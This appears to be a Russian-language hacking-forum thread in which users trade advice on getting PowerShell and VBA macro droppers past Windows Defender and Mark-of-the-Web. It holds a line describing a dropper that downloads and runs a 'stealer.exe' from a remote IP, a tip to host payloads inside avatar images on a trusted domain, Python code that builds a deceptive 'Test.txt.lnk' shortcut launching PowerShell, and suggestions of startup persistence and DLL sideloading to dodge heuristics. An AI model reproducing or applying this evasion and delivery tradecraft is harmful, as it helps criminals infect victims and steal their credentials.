актуальные методы обфускации VB6/VBA

Chips · 08.12.2024

кто-нибудь может подсказать актуальные методы обфускации PowerShell и / или VB6/VBA макросов, которые не палятся дефендером? на форуме особо ничего не смог найти. на гитхабе всё дохлое и определяется эвристическим анализом как троян вне зависимости от нагрузки чистого кода.
мб кто знает, где искать, или подскажет в сторону гайдов для собственного переписывания?

dunkel · 08.12.2024

У тебя на psh/vb дроппер или сама малварь?

Chips · 08.12.2024

dunkel сказал(а):

У тебя на psh/vb дроппер или сама малварь?

потенциально только дроппер.
я изначально смог успешно протестить его с шифром подстановки и StrReverse, он проходил MotW и дефендер, но сейчас при похожей структуре винда моментально банит файл, даже если он из зипа распаковывается; теперь ищу альтернативу, может, тут кто-нибудь рабочую обфускацию подскажет

dunkel · 08.12.2024

Chips сказал(а):

потенциально только дроппер.
я изначально смог успешно протестить его с шифром подстановки и StrReverse, он проходил MotW и дефендер, но сейчас при похожей структуре винда моментально банит файл, даже если он из зипа распаковывается; теперь ищу альтернативу, может, тут кто-нибудь рабочую обфускацию подскажет

А что дроппер делает? Просто загружает и запускает http://1.4.8.8/stealer.exe ?Попробуй пейлоад в картинке аватарок загружать с доверенного домена типо https://filestore.community.support...leimages/864bafb6-3179-432e-877a-b48137f57c04

Chips · 08.12.2024

dunkel сказал(а):

А что дроппер делает? Просто загружает и запускает http://1.4.8.8/stealer.exe ?Попробуй пейлоад в картинке аватарок загружать с доверенного домена типо https://filestore.community.support...leimages/864bafb6-3179-432e-877a-b48137f57c04

вопрос, возможно, тупой, но есть ли какие-то гайды на форуме? я про доставку с подгрузкой и .lnk мельком слышал, но разобраться не смог и думал, что проще и актуальнее всего сейчас через макросы в доке доставлять

dunkel · 08.12.2024

Chips сказал(а):

вопрос, возможно, тупой, но есть ли какие-то гайды на форуме? я про доставку с подгрузкой и .lnk мельком слышал, но разобраться не смог и думал, что проще и актуальнее всего сейчас через макросы в доке доставлять

скрипт создает .lnk ярлык с psh пейлоадом

Python:

#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch

# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")

# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')

# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()

Lipshitz · 08.12.2024

Try "phish for persistence" style. Instead of downloading and executing a payload right away break it up by dropping something in startup or editing a commonly used shortcut etc to de-chain suspicious steps in heuristic analysis

Chips · 08.12.2024

dunkel сказал(а):

скрипт создает .lnk ярлык с psh пейлоадом

Python:

#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch

# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")

# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')

# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()

интересно, спасибо!

Chips · 08.12.2024

Lipshitz сказал(а):

Try "phish for persistence" style. Instead of downloading and executing a payload right away break it up by dropping something in startup or editing a commonly used shortcut etc to de-chain suspicious steps in heuristic analysis

I'll look into that, ty!

Lipshitz · 08.12.2024

Here's an example dropping dll for teams sideloading. Just use your imagination

Hang Fire: Challenging our Mental Model of Initial Access

For as long as I’ve been working in security, initial access has generally looked the same. While there are high degrees of variation…

medium.com

Hre7ki113m · 10.12.2024

Chips сказал(а):

can anyone suggest current methods for obfuscating PowerShell and/or VB6/VBA macros that do not fall into defender? I couldn’t find anything special on the forum. everything is dead on the github and is defined by heuristic analysis as a Trojan, regardless of the load of the clean code.
mb who knows where to look, or will he suggest guides for his own rewriting?

the best one is https://github.com/danielbohannon/Invoke-Obfuscation
it is full of great idea just mix them

актуальные методы обфускации VB6/VBA

Chips

floppy-диск

dunkel

(L1) cache

Chips

floppy-диск

dunkel

(L1) cache

Chips

floppy-диск

dunkel

(L1) cache

Lipshitz

(L3) cache

Chips

floppy-диск

Chips

floppy-диск

Lipshitz

(L3) cache

Hang Fire: Challenging our Mental Model of Initial Access

Hre7ki113m

CD-диск